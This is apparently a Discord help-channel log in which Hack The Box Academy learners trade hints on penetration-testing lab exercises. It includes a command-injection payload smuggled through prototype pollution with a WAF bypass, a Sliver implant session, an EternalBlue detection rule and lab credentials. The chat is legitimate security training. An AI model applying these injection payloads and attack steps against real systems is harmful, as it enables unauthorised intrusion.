#modules
Yes... and rule #1... memo all credentials, always
I thought I did but I guess not
just use module search. You'll find it.
yes all the modules are independent of each other
this section only has like one question
so I don't get how to solve this one
ok is anyone available tonight?
or like to DM?
what section are you on?
its usually* as simple as going through the previous sections and ctrl + f for "kira" in this case
Password Attacks Module and the section is Protected Files
I did this in a few previous sections its not showing up
hold on someone DMed me never mind
My recollection is that in the material provided, they showed you Kira's PW. You need to use that to get her id_rsa file... pretty straightforward.
So what ended up happening was I needed to comment out socks4 in config file since i ran socks5 in meterpreter, swear i did that hours ago and didnt work then but when i tried it again it worked afterwards lol
Bro, I'm still not getting it. I scanned for the right port and found a vulnerable service running (Apache 2.4.41) but there is no exploit for that
Pls how do I go about it now?
Check the website itself
BTDT
which is why I pointed out proxychains.conf update as well...
This worked, thanks a lot I'm so grateful.
Question tho, why was this the approach that worked and not trying to search for Apache vulnerability?
It's not directly in the module, you had to bruteforce it
Same Empire error even happens in the web-based PwnBox hosted by HTB themselves.
```
Executing powershell-empire server
Traceback (most recent call last):
  File "/usr/share/powershell-empire/empire.py", line 11, in <module>
    import empire.server.server as server
  File "/usr/share/powershell-empire/empire/server/server.py", line 14, in <module>
    from empire.server.common import empire
  File "/usr/share/powershell-empire/empire/server/common/empire.py", line 18, in <module>
    from empire.server.core import hooks_internal
  File "/usr/share/powershell-empire/empire/server/core/hooks_internal.py", line 5, in <module>
    import jq as jq
ModuleNotFoundError: No module named 'jq'
┌─[root@htb-0klzeaiovo]─[~]
```
It lets you install jq, but then still gives the same error.... very frustrating. THIS is one tool that I loathe... it has never ever worked for about the eight years that I have tried to use it off and on...
tried that... that is starting it from the menu... you have to run as root.
Tried that...
Same thing on Kali
Exact same error
i remember not being able to get it to work so i just moved on
It's a part of the CME module in the CAPE path, so not a move-on thing. It's something that HTB should provide a work-around for.
You don't need it to complete the module or do anything. it's a c2.
you can post about it in #1234357888114364508
the cme part is just to upload/install i think, you can do the same with sliver for example
There is a section specifically on this ... and better to fix things than just move on... down the road I know I will need C2
yeah but it's a cme module, not a c2 module
it just showcases it i think, but like i said post in #1234357888114364508 to get it fixed
Sliver is for port-forwarding. Not C2.
no sliver is a c2
Okay... cool
Apache is the underlying Webserver, the website itself runs on top of Apache and implements much more user-facing logic. That also makes the website much more susceptible to exploits. Finding an exploit in Apache that gives you remote code execution would be a huuuge thing affecting a ton of websites.
Nice to know... never used it that way. Thanks for the direction...
It's in the CAPE path as well, so it'll teach you
Right... just seeing that. Always just used it as a port forwarder on a target.
I am sick and tired of Empire... every f (rea?)cking time! Never works!
you could try downloading it from the github and see if you can get it working there. like i said i gave up and just moved on because i hit the same brick wall. https://github.com/BC-SECURITY/Empire https://bc-security.gitbook.io/empire-wiki/quickstart
Did that... multiple times on everything... using their installation instructions.
Different module but same kind of error.
Debian, Kali, Parrot, Parrot-HTB version... nothing. I am doing what you did. Moving on. Reading Sliver C2 docs now to vent the frustration.
I know that sliver works because I use it all the time.
Hmm...I get it now. Thanks 🤝🏾
what else were you using it for? 😂
oh i see
is it allowed to share account with others to reduce cost for tier 3 modules?
No.
oke
You'll just end up not being able to work on the tasks anyway, as connections are limited to one per account.

i hate thor, i love iron
Hate is such a strong word. But Ironman > Thor
I just started doing academy, what module does thor and ironman come in?
Fundamentals of AI
The getting started on Discord
Cracking into HTB Discord skill path
Okay
Anyone unlocked Tier 4 module, could you confirm Show solution is available like it is present in Tier 3 modules for Gold annual subscribers.
There is currently no annual subscription that includes Tier IV modules. Therefore no solutions are available.
Hello all,
I've been stuck on it for a few days now, on the Attacking Web Applications with Ffuf module, and on the Skills Assessment - Web Fuzzing chapter.
and on the question. Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?
I would like to know the list of words you used.
Hi there, I’m also stuck on the Attacking Web Applications with Ffuf module - skills assessment question 3
I clicked on the “show solution” button and the solution did not give the correct output from the answer sheet
NoSQL Injection Skills Assessment II
Hi, I'm stuck on resetting the token, the script that I have can't generate a reset token in any way(
What am I doing wrong there?
Who managed to do this, maybe I'm missing something in my script?
The -mr flag is failing for me, I copied the exact command and I get a “dquote”
Did hackthebox really vet through their own solution?
*One of the pages you will identify should say 'You don't have access!'. What is the full page URL?*
hello!
Is that the question you mean?
Did you find the point of injection?
Yes sir! This is the question
I followed the solution step by step but it did not work for me
I’m getting a “dquote” from the exact command provided by hackthebox
yes, this is the ||"username"|| field
I just did it like this:
||We change the port number to the word PORT.||
And the found address matched the answer.
Really? Then how come I’m getting a “dquote”?
If you know the field then just dump the token
Similar to what you’ve done in the ssji section
send me (pm) a screenshot, I'll take a look.
Hmm, it's a little different there.
I had to look into the tooltip and there's a completely different script.
he doesn't do anything (he gives out an empty value instead of a token)
, so he decided to find out how others were able to get the token.
I don’t know what you’re talking about
Okay 👍
I understood it so that we need:
1 - to generate a password reset token.
2 - The script should generate it for us.
3 - Then I apply it on the "reset" page
4 - and change the password for the user.
5 - Then I enter under it.
In the second step, I have a problem)
Did you find a valid username?
yeah
Yeah so you can see the difference in response size
Then you just dump the token with a payload similar to what you’ve done in the ssji
But you don’t need a this.username.match, this time you need this.token.match
Hello, everyone! I can't understand why the minimal offset in this EternalBlue rule ||is 4.||
https://academy.hackthebox.com/module/226/section/2415
In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert?
I have found a solution on the internet ||and 4 is the correct answer,|| but I don't understand why because none of the payloads seem to match the content string from 4th byte... and I couldn't really find anything that would match from 9th byte too.
Suricata rule: content:"|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 08 ff fe 00 08|"
I changed this rule's offset to 4 and got alerts on the following ports (I didn't get alerts before changing), yet when examining the logs in Wireshark they don't seem to match the content (???).
Am I looking at the wrong logs in Wireshark? Or looking at the wrong place for the payload, have no idea. Please help me out
hello guys
i finished all the sections of pivoting module and i am stuck at "socks and rdp tunneling"
the question is "Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop. "
when i rdp to the pivot host and i ping the internal given ip i get destination is unreachable
any idea

Follow the steps in the section. You can't go from the target to the mentioned IP directly
They r both on same subnet I tried to ping it but there is no reply
And I already did the steps 
hello guys, did any1 try connecting the ovpn of hackthebox using windows wsl? its not working for some reason
The spawned target and the IP in the question are not in the same subnet
I think there is some kind of configuration in WSL that has to be changed from default when using a VPN for DNS to work properly. I ended up having to disable my VPN anytime I used WSL.
The provided ip is connected to other NIC and that interface is 255.255.0.0
okay thanks ❤️
ah well didn't expect them to use a /16. Nonetheless the point still stands: the target can't talk to the IP so you have to go through another host first (as shown in the section)
Have you tried manually searching the bytes in Wireshark to see where they match?
I have tried with data.data contains == value. Is there another filter for that?
I'm revisiting the Kerberos Attacks Module, anyone for a quick DM on the Unconstrained Delegation Section to check some of the commands in the exercise? I'm getting the auth but krbrelayx isn't extracting the TGT
I'm really impressed with the modules so far. I'm just doing stuff accessible from the student subscription and learning a lot that wasn't covered when I did GPEN
very good value getting this much info organized like this for $8/mo compared to the $9k SANS course
It could be any of the yellow packets in your Wireshark screenshot, you will see that they all in the payload section start with 4 random bytes, then it has the common header of 0xFF followed by “SMB” in ascii. The next hex value is the command, in your rule you are looking for 0x33 which apparently is “SMB_COM_TRANSACTION2_SECONDARY”. I can see in your screenshot that you have a few of those in the yellow lines
What’s important with the offset is that you don’t count the tcp header in it, it’s the offset starting at the content section of the packet
It feels like I'm missing something basic here. I've looked for the matching hex values using 'find packet' and it finds matches, but they're not sequential and not in the beginning (probably they follow the tcp header); also it matches only starting from 33 instead of ff
Hello, I need a hint for module Password attacks - skills assessment - level 2.
I am logged as Jason on the target, and see another user who holds an ssh key. I have run hydra for more than an hour with that username (and the [mutated] password list given as a resource), but without success. I now want to steal his ssh key for offline cracking, but I need to escalate Jason's privileges, and I don't see how to do it...
Ok you logged in as 'Jason', have you tried to enumerate services from inside the machine?
What about localhost services?
I don't recall needing to crack the second user password
I see a list of active services, but nothing obvious to me
It was just there
Well check those services, and whatever information you obtained so far that might have some further information about some services that can be useful.
I can share the notes I have on it if you'd like to try out what I've done to get it working. I was setting it up to see how it works with Netexec.
I'm not comfortable with local enumeration, so far I've always used remote enumeration with nmap. Can you send me to the appropriate module to upgrade my skills please?
You don't really need to stray too far, Look for information on whatever obtained content for another service which could be useful.
I'd go back to that document you have access to, read over it, then enumerate localhost services and see if what you can identify in that document is running locally.
I'm not done yet, but I've made progress thanks to your help, I've got a password for 2nd user 🙂
??
💪 Thank you !
Does someone know if the gold annual subscription you pay all the price at once, or you can pay it over time, over the year
The annual subscription is a one time payment
Hey, has anyone completed the final assessment on the advanced XSS and CSRF module? I feel I’m on the right track but have hit a road block and would love a nudge
The Suricata rule mixes hex and ascii values. The ff is hex, but the “smb” is ascii. Smb in hex is 53 4d 42, and if you check your screenshot that’s exactly what it shows, ff 53 4d 42 33 and so on
And you also see that there are 4 bytes before the ff, which is exactly the offset it was looking for. These 4 bytes are probably not deterministic and change with every request, but everything after stays the same for this specific attack
Hi, is there any support available here? I'm working on the LDAP Authentication Bypass challenge and managed to retrieve the flag HTB{...}, but the lab doesn't accept it as the correct answer. Here's the lab link: https://academy.hackthebox.com/module/204/section/2229.
Could someone help me figure out what's wrong?
Verify there aren't any leading or trailing spaces and if there aren't any, try to refresh the page and resubmit the flag.
AH. Thanks mate.
Is there going to be any Mobile Pentesting path ?
So far, HTB has not announced anything like this. Also, there are currently no modules that could indicate such a path.
So im kind of struggling with the Whitebox attacks module on Remote Code Execution (https://academy.hackthebox.com/module/205/section/2343).
I have setup a localhost debugger and inspecting the Object values however submitting my payload:
```
{"__proto__":{"deviceIP":"127.0.0.1; whoami"}} // Gets caught in WAF
```
And
```
{"constructor.prototype":{"deviceIP":"127.0.0.1; whoami"}}
```
Bypasses the filter, however the object values just looks off to me, and i dont know if i am doing something wrong here:
```
{
  username: "test",
  id: 1,
  password: "a",
  deviceIP: "127.0.0.1",
  "constructor.prototype": {
    deviceIP: "127.0.0.1; whoami",
  },
}
```
The constructor.prototype gets stored as an object inside the User Object with its key and value pair.
i've never done prototype pollution before so i feel like i have 0 idea of what im trying to do
For some reason i cant rdp into windows box on the living off the land section in pentester pathway a black screen comes up then it goes off
😄
Just ask your question
you can only post content from tier 0 modules.. you also don't really need to post screen shots you can just ask the question and say which module/section you're on
ok so the dialog there says we do both an ARP and a ICMP ping using the -sn and -PE combo but im only seeing ARP in the output...
It can't draw the corporate AUP screen. It's an issue with xfreerdp, haven't seen it on remmina or rdesktop i don't think
the dialog suggests that forcing it with both switches is done to force both scans, but i only see the one
i get that, but why are ICMP pings being forced but not returned in the output?
oh i guess i should just assume that in the output and not see the ARP who/has as a red herring? or what?
maybe i need to traffic check in wireshark?
It could be that the icmp request is being dropped
¯_(ツ)_/¯
Could also just be arp came back so it didn't send icmp
ok
ill have to check in wireshark i guess to confirm
ty @fathom pendant i certainly appreciate your help on the reg.
Hello all! Is there anyone else having issues running the Windows VM on this module https://academy.hackthebox.com/module/87/section/885? Ive been able to install all tools, but when Im trying to install a linux distro I get this error:
Please enable the Virtual Machine Platform Windows feature and ensure virtualization is enabled in the BIOS.
Ive got the Virtual Machine Platform Windows enabled and I tried enabling Virtualized AMD-V/RVI on VMWare but I get this error:
Virtualized AMD-V/RVI is not supported on this platform
Im a beginner, this is so hard to troubleshoot 😦
Ive followed these links without any success:
https://askubuntu.com/questions/1459065/virtual-machine-platform-windows-feature-and-virtualization-in-bios-is-enabled-b
https://www.reddit.com/r/vmware/comments/k7hd4z/virtualized_amdvrvi_is_not_supported_on_this/
Btw Im not completely sure if I just skip this part and keep going with the rest of the setting up section...
sounds like you're trying to do nested vm on your baremetal is that right? a vm within a vm?
that may not be supported by your distro/hardware/whatever
if you have ubuntu on baremetal and you have a windows vm that you're using for testing, then make a separate vm for kali, within the same hypervisor, not a nested hyper-v in windows vm
Hello, I have a question based on the Introduction to Active Directory module.
I'm trying to setup my own DC and to modify some stuff. I'm currently working on my audit policy however I observe that the audit policy I setup from the Group Policy Management is not the same as what I have on my DC if I run auditpol /get /category:*.
It seems that the GPO is overwritten but I don't know by what...
Its just a VM on my windows machine. My PC is running Windows and the virtualization is enabled. Ive got the ParrotOS VM ready and its working like a charm, but the Windows VM is driving me crazy.
ok, yeah, could be the iso dunno. but if you know how it should work and you've done it before prob best to move on
You don't have to set up your own vm, also you'd need a windows server ISO to have it run as a DC iirc
gpresult from cmd line
gpresult /?
Well, Im a super noob. Ive worked as dev for some years but I never needed VMs and stuff, so Im taking the modules step by step so I dont mess anything up. Im following the Information Security Foundations path and this is the third module of that path. It also mentions the idea of paying for a VPS (I also have 0 experience using it). I dont know if Im in the right path for a noob and if it makes sense to setup the windows vm or the VPS when I have 0 knowledge about any other cybersecurity concept
vm better if you have a machine that can run a vm
no dont look into that too much, you just need to... you're running hyper-v or vmware?
You don't need a vps
Ive got a ParrotOS VM already up and running. Maybe I should jump directly to the next module (Linux Fundamentals) then?
Im running vmware
Does vmware give you type-1 and type-2 vms?
BIOS/UEFI? that might be the prob
just off top of my head
its really not worth digging into if you want to move on with the content (unless you're deadset hung up on resolving it, but it's something config related, guaranteed) if your parrot vm works you're good to go, figure out the windows stuff later
vmware offers both. vmware workstation is a type 2, which i'm guessing most people are using.
this might be the prob i have only used vbox for some time now so i dont run into the issue but i certainly run into bios/uefi issues on vm from time to time
In the MSSQL, Exchange & SCCM attacks - Introduction to Privilege Escalation on MSSQL - when enumerating the webshop users & roles, it indicates that there is another db_owner - this is equal to NULL
"the name is left empty since our user does not have access to this information."
It then goes on to say "we discovered our login (ws_dev) can impersonate ws_user" - the previous screenshot only shows db_owner:NULL, how are we inferring / determining that ws_user has the db_owner role?
i just scrolled up and read the issue, sounds to me like his hardware doesn't support virtualization
for AMD it's called AMD-V and Intel it's called Intel-VT-x
Attacking Web Applications with Ffuf Module's Skill Assessment Question 3 seems broken, even if i submit the correct answer it is showing as incorrect.
did you read the hint to format it properly
got it now
my bad should have seen it
now you're firing on all cylinders! 😛
lol
You can impersonate and then enumerate again, that should show the role this time around
my ass needs to do the skills assessments for each module again
story of my life
the funny thing is i didnt take notes on them
so even i dont remember how I solved them
ah ty
hey everyone,
i am doing skills assessment for crackmapexec module and i got stuck after getting the user N**** creds. i know i can access the share on dc, but not able to download anything due to insufficient permission. i must be missing a step. any nudges please? ;D
You should be able to download the ccache file
funny it says permission denied
Are you able to write in the folder on your drive?
yes
Mb you don’t have permission to dl because you can’t write? lol
lol
nick account right?
Has anyone done 'heal' on htb?
Check the #welcome channel to verify your account and get access to the #1317551396920229958 and #boxes channels
Hey guys Im Adrian
I have a problem with my sliver
```
sliver (FRIENDLY_GRAMMAR) > shell
? This action is bad OPSEC, are you an adult? Yes
[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
bash -p
id
/bin/bash
export TERM=xterm
ls
ls
id
```
I created an implant pointing to my host then I got a back connection but when I tried to create an interactive shell session it seems like it is stuck
```
sliver (FRIENDLY_GRAMMAR) > sessions
ID         Name               Transport   Remote Address         Hostname   Username   Operating System   Locale   Last Message                            Health
========== ================== =========== ====================== ========== ========== ================== ======== ======================================= =========
57bf091d   FRIENDLY_GRAMMAR   http(s)     10.129.229.147:45184   dmz01      root       linux/amd64        en-US    Sat Dec 21 21:31:30 PST 2024 (1s ago)   [ALIVE]
sliver (FRIENDLY_GRAMMAR) >
sliver (FRIENDLY_GRAMMAR) > use
? Select a session or beacon: SESSION 57bf091d FRIENDLY_GRAMMAR 10.129.229.147:45184 dmz01 root linux/amd64
[*] Active session FRIENDLY_GRAMMAR (57bf091d-5553-4207-8e34-1b80ee632b29)
sliver (FRIENDLY_GRAMMAR) > shell
? This action is bad OPSEC, are you an adult? Yes
[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
```
What is the API key in the hidden admin directory that you have discovered on the target system?
```python
def For_Future_Generation_of_Hackers():
    print("Just follow the instruction. There is nothing like Enumeration. Hint: vhost, gobuster and dns. Once you guys found something, Start Enumeration again, Happy Hacking, Over and Out, TheUnknownPirate.")

For_Future_Generation_of_Hackers()
```
hey,
any hint to get the last flag for crackmapexec skills assessment?
If you got the ccache and know how to use it you are basically done. The user is pretty powerful
it does not run any command on dc tho
It can dump secrets tho
hm.. ntds...
Hey guys, i'm trying to do the python3 module but when i want to run my script i always receive this error (from my own box and from the htb instance) can someone help? I already tried to install uninstall BeautifulSoup it gives me an error and says the "new" one is beautifulsoup4, and this module is already installed
thanks
uhmm, i couldnt find netcat package on chocolatey, what should i do?
i'm new i'm doing setting up rn
oh yeah, then im not sure
but i highly suggest using your own linux vm or pwnbox for the academy, they have the tools pre-installed for you already
like... it has npcap and nmap, so i dont know which one to install
i have a laptop for my kali linux, i'm just trying to setup for my window laptop
if youre setting up a windows vm, you don't really have to worry about it
for now, a linux vm will be sufficient
thanks u guys,i will try on VM
Hi I need a hint on skills assessment part 2 for Attacking Active Directory module. I am on this question : "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. ".
So far I have obtained a foothold in the domain, got a domain user and used that user to enumerate a list of users, groups, obtain bloodhound data. Also I have tried password spraying. Also searched for scripts in sysvol and gpos.
Use the passwords used in the example
Hi everyone! Anyone up for a quick brainstorming session on the "Injection" skill assessment? Feeling a bit stuck and could use some ideas
Rubber ducky based off of what you learned in the module, you might need to combo techniques
I’ve made some progress and managed to get the internal IP, but now I’m stuck. It would be great to chat.
Well I'm not available to chat
in the example? ok i go back thru the modules
Got it, thanks! I don’t want to disclose too much here, but if anyone’s available, I’d love to brainstorm about this.
Also contemplating making DMs paid depending 🤔 but I'd need access to my computer before committing
sorry this was to me right?
Yes
OK. GL.
ok spraying with one of the passwords i found in one of the module sections. thank you for the hint
damn kerbrute is fast
hmmm i tried two of the passwords used in the password spraying section, didn't get any hits against the user list i got by enumerating the domain users through ldap
still no hits?
no but maybe my user list is not good or something. I just checked the solution and it should have worked
I'm an idiot. I wasn't using the right file for the user list. I have two files named very similarly. user.list and user.lst. I needed to use user.lst
but now the instance died 🙂
time to start again
it's why kerbrute was coming back so quickly i guess
unblocked thank you for the hint
Probably the hardest module I've completed so far
The skill assessment was incredible
waiting for admin
I have done the identify. But requires admin for support.
Has anyone done heal though
This channel is for Academy. Identifying doesn't require admin.
hmm Vultr charges me 17.5$/month. Is it normal?
It does for me ....
it's fully automated... do you have your account identifier?
do u guys have any options for VPS?
you don't need to get a VPS
are you sure it's vulnerable?
ok those are two totally different php wrappers
the expect wrapper isn't enabled by default, how do you know it's vulnerable?
allow_url_include?
That shd be enabled? for this to work?
or is there any other way we can do it?
do what?
In file inclusion module it was told that to use expect wrapper, allow_url_include shd be enabled
To know if expect wrapper is enabled?
that module has a lot of sections, still not sure what you're trying to do.
do you mean the web attacks module?
yes!!
I'm able to read source code using filter wrapper
pretty sure you need to do it like the module shows using a dtd not just executing commands directly
The other way also uses expect
ok, did you try it?
I got your point!!
The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work.
I'm sorry for wasting your time!!
you're not
but there's more to it
read the remote code execution with xxe section again
it says if you can't see the output you may need to execute the command in a more complicated way
I did try the other method as well though
i would check all your stuff is setup correctly then
sudo python3 -m http.server 81
Serving HTTP on 0.0.0.0 port 81 (http://0.0.0.0:81/) ...
no request came on my python server
just wanted to know If you are aware that in the exercise, can we use expect wrapper? Is it enabled if you have some insight?
if you're going to embed a variable you should wrap it with {} ie ${VAR}
If you add http://...:81, you don't get the request in your sv either?
may just not be vulnerable
nope
└─# sudo python3 -m http.server 81
Serving HTTP on 0.0.0.0 port 81 (http://0.0.0.0:81/) ...
for that i think i need to bypass { and } as well, but there isnt any variable i suppose
what do you mean?
like... i saw in the setting up module we register a VPS
may just not be vulnerable.
You said it worked for you!!
then i went and looked at the actual challenge, it wants you to read a file not rce
you don't HAVE to; i've not once used and/or needed a VPS for academy
thank you a lot
I am on the footprinting hard and found ||mysql|| user with cat /etc/passwd after ssh'ing into the target as ||tom||. I then used
||cat /etc/mysql/mysql.conf.d/mysqld.cnf || to get the config for the service but it only lists the user and bind-address. I've searched for hints in this chat and saw that people were able to login to ||mysql|| but I am not sure what I am missing since I haven't been able to with default or empty passwords. A tip would be appreciated
have you tried the creds you found already?
Does anyone know how to get a girlfriend in 2025?
that's not a module topic
ty ty, I thought I did but I just tried again and it worked
girls think htb certs are hot
get CAPE
Sorry, no spoilers for Tier 7 Modules
Certified Boyfriend Brings Happiness
you heard it here first, g0blin just leaked the next HTB path
Hah oh no
I'm doing the Skills Assessment - Windows Fundamentals and can't figure out the answer to || "What is the name of the service associated with Windows Update?" || I am thinking that maybe prior knowledge is messing with me, because none of the answers I can find are the right one. If I could discuss it, I'd appreciate it
NM, reloading my webpage fixed it...
the answer is in your question 😅
Is there a way to export/copy a list of payloads either by manual selection or filters (based on status code, length, etc) directly to a wordlist?
I bruteforced the password using pwnbox and I got the flag
Hi, i've got a question in regard to Advanced SQL injection SA2 - i'm stuck at the last part, but what's funny is that I have gold annual subscription and there is a walkthrough that seems logical but the code does not work 🤣 there is no indication in the walkthrough that there should be some adjustments to the code (which I tried to tweak regardless to make it work but failed). Could somebody help or should i "speak to the manager" or some help center as it seems to be the case of wrong information on the site...?
The admin uses a firewall that prevents you from exfiltrating the cookie directly.
it is not about the cookie
If you suspect an issue with the walkthrough #1234357888114364508 ; utilize ||spoiler markdown || if you need to copy/paste from the walkthrough
Have you installed the correct version of PostgreSQL Server?
please help
Read the hint
The admin uses a firewall that prevents you from exfiltrating the cookie directly
should I try with dns rebinding ?
No, you're already on the right track. Your payload works when an error occurs. Does an error really occur? Can alert work?
yes all works but there is no cookie
try using an image URL that certainly does not exist. Then onerror will surely be executed.
not worked
send me a dm.
I'll delete the pictures here. They contain spoilers
hey guys i'm stuck on this since several days anyone know the issue?
I've installed postgres with sudo apt install postgresql-server-dev-all as sudo apt install postgresql-server-dev-13 is not found (unable to locate package, even after apt update) and couldn't find the other workaround in google
but the problem seems to be at earlier steps, e.g. SQLi not working
(im doing it on PwnBox)
Rename your script to something else
already did it
if you get the same/similar error then you've used another name that's used during an import
I thought to but i literally cp the script from the module
i'm gonna try in the evening i'm trying mastering python rn
The script contents are alright, you just can't name the file html.py
Hi there, I am stuck at the exercise in Authentication Bypass via Direct Access in Broken Authentication module. Can anyone please help me?
oh okay i'm gonna try it thanks
is it a special file name or? Why is it not working with this name, any idea?
Likely there is an import importing html, and when you have that file name, it will choose that file instead of the library/external source that you actually want
^ this, you can see it towards the end of the error message.
It’s trying to import html.entities from your file and there you have import bs4 in there. You’ll end up in an endless loop.
You can lookup the import search order
also, when i finally managed to install postgresql-server-dev version 13, then the package does not compile at all - fatal error, #include "postgres.h" no such file or directory
hello there i was trying to solve a question from introduction to windows command line module where question is (SSH to 10.129.255.206 (ACADEMY-ICL-WIN11) with user "htb-student" and password "HTB_@cademy_stdnt!" ) Access the target host and run the 'hostname' command. What is the hostname? i tried ||*~~raja@Raja:/mnt/c/Users/rajak$ ping 10.129.255.206 PING 10.129.255.206 (10.129.255.206) 56(84) bytes of data. 64 bytes from 10.129.255.206: icmp_seq=1 ttl=127 time=225 ms 64 bytes from 10.129.255.206: icmp_seq=2 ttl=127 time=221 ms ^C --- 10.129.255.206 ping statistics --- 3 packets transmitted, 2 received, 33.3333% packet loss, time 2001ms rtt min/avg/max/mdev = 221.329/223.131/224.934/1.802 ms~~*||
***||raja@Raja:/mnt/c/Users/rajak$ nmap -p 22 10.129.255.206
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-22 12:10 UTC
Nmap scan report for 10.129.255.206
Host is up (0.23s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds||***
raja@Raja:/mnt/c/Users/rajak$ ssh htb-student@10.129.255.206
Connection reset by 10.129.255.206 port 22 did anyone face the same issue ?
It looks to me as if some components are not installed correctly
could I send you a DM?
sure
Hi, can we make suggestions about modules?
/feedback
pretty sure there's already a module that covers that
its starts with tier 3 modules, but having on pivoting helps a lot with cpts cert
hi, i'm working on skill assessment 2 on Attacking AD. I have arrived at the question:
"Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host"
So far I have used mssqlclient.py to connect to the SQL01 host and ran a few commands to enumerate the directories, logins etc.
My thoughts are i should be able to run a cmd shell to then exfiltrate registry hives?
oh i have also tried using evil-winrm to try creds i have already. no luck
Should have been able to enumerate that local group and tune your attack.
Try making the extension in the early section of the Module
i've taken a sneak peek at the windows priv esc module and using the juicy potato technique in there
or trying to.... so far not working
Try another one, there was one that said Printer Spoofer
ok will take a look thx
<@&861185840277487616>
I am working on HackTheBox Academy and currently connect to a provided machine via SSH to perform attacks. I would like to pivot the entire network of this machine into my own system, so I can run tools such as NTLMRelayX and PetitPotam directly from my machine and access the Domain Controller (DC).
I have tried using LigoLo and other tools but have not been successful. Any guidance on achieving this would be greatly appreciated.
Did you try normal ligolo or ligolo-ng?
hey guys, Im currently working on the Windows Lateral Movement skills assessment and am having trouble with question 2. I got the credentials for Arturo and RDP into the machine with the necessary port but no flag on the desktop. I know I need to access wsus but am having trouble doing so. Would appreciate a nudge on this one
The text file you found talks about default ports and mentions a specific service, try that one
Hello guys nice to meet you all
I’m really passionate to learn hacking but i have no idea about this …… i’ve something before about networks or something like that so i use iPhone 8 and looking for a way to learn it by my phone and also i have a PC
So any advices ?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hacking via phone is 10x harder. Not to mention it would require jailbreaking it
Also your eyes won’t like it
Hi there i am starting to learn hacker in my university's study group and I won a 1 month license to HTB Enterprise in this end year so I want to spend the most time I can Learning but from what i've seen it is more useful for advanced learners, since they usually recommend HTB Academy for starting out, I wonder if anyone wants to learn side by side along me, :b, and also may I ask what could i do If having a machine started and connected to the VPN it still seems to not respond at all. Thank you very much. I do not know if it is the proper channel to ask or is it #1024429874246590575 where i also asked. Thank you all.
ligolo-ng where We get one proxy and agent
Can anyone assist with 'Print Operators' modules for Windows PrivEsc? I don't understand how to utilize this UACMe's akagi64.exe in this lab. I've run the suggested keys from the github page and either nothing happens or I get a UAC prompt for creds. Any guides available for this?
I don't recall the section ever talking about akagi64.exe, does it say to use that?
It's pretty light on details. "The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line. "
I don’t think Ntlmrelay will work since it needs to connect back to you
the repo shows akagi from run examples
it walks you through some things.. have you tried those?
it walks you through the capcom driver, then shows you automated eoploaddriver
I ran into an error on eoploaddriver, figured without the uac bypass I am going to get nowhere.
I'll try skipping the UACme stuff and seeing where I get.
yeah this doesn't require anything outside of the material
Will other tools work? Expect ntlm relay and is there any way to make it work
only tools that dont need inbound connections, unless you portforward
petitpotam only sends a connection so that will work
Okay Yea that worked with dynamic port forwarding but ntlmrelay didnt. With portforward how can i?
Thanks for clearing up my question.
ntlmrelayx uses a lot of ports, so i suggest you just use it on the attack box
Okay, Thanks A lot
hey, I'm new to HTB and currently doing the IS foundations path, but i was wondering, they now announced the new module introduction to IS security, which is not in that path, which would be more useful to do first, the path or the module?
I'd do the path first
this doesn't look like an HTB academy module
Enterprise is only for businesses so you might not find a lot of people that have the same kind of access you do. Enterprise has access to some prolabs and Sherlock’s that normal users don’t have, so if you want to make the most out of it you’d do those. Do you have to activate it now or can you use it at a later time?
it looks potentially like that interface is EP; but that doesn't look like an academy lab; hence why i said something
:)
It says EU VIP+ on the screenshot. Isn’t that main platform?
Activated fow now
i'd say reach out to support if you're facing connection issues
Sure u.u. It is just that you know I started on this world like a month ago and getting this huge reward , well i do not know so much about it but im trying to get the best out of it
I ended up solving it with the FTP connection recommended in the help page. Thank you all
Do you accept cubes?
I do
im still having trouble accessing wsus server on Windows Lateral movement skills assesment question 2. Anyone have a hint?
Anyone can help with Privesc in Windows? Defender and amsi giving me a headache. If so, plz dm
in the WIndows Privesc module? i don't recall many issues with defender and amsi
Nope outside of htb platform
well then it sounds like it's either illegal or part of a ctf in which case outside help is cheating
but since it's not relevant to HTB academy, doesn't belong in this chat
Sounds good
It's neither but that's ok
anyone have any advice when trying to RDP get error of "[ERROR][com.freerdp.client.x11] - failed to open display:
[ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set." I read some HTB forums and found this https://unix.stackexchange.com/questions/598924/display-environment-variable-not-set but that also didn't fix it
don't run around your system as root
Im currently logged into the box with just the user creds given
you can't rdp on an ssh session
it doesn't pass through the display
it helps if you supply the module and section name
oop my apologies its the Active Directory Enumeration & Attacks, Skill assessment 2 question 3
you need to pivot to use RDP
use whatever pivoting method you wish [my personal favorite is ligolo-ng]
well it did work whenever i used evil-winRM was just wondering why that RDP error came up
well evil-winrm isn't rdp
it's a different protocol entirely 
it's winrm - windows remote management, CLI
but again; one of the modules/methods you should know in order to be successful in AD enum&attacks is pivoting
Hey,
i am trying to respond to the last question for crackmapexec module about vulnerability scanner. However, my proxy does not work as it seems the software is not compatible to windows version 'This version of C:\Windows\Temp\chisel.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher'. Does anyone know the right version or a way around this?
did you download the 32 bit or 64 bit :)
knowing which one you're using helps
i believe was 32 =/. i was just following the module. i will download again . thanks for your prompt response
64 bits
I am in that same section of CME module now... using 64 bit
this was it i was being silly, had to xfreerdp into the first box instead from my ssh, then was able to xfreerdp into next box
thank you 🙂
worked for you? what URL did you download it from?
I think it's a go program, so when you build, it will build for all platforms all at once.
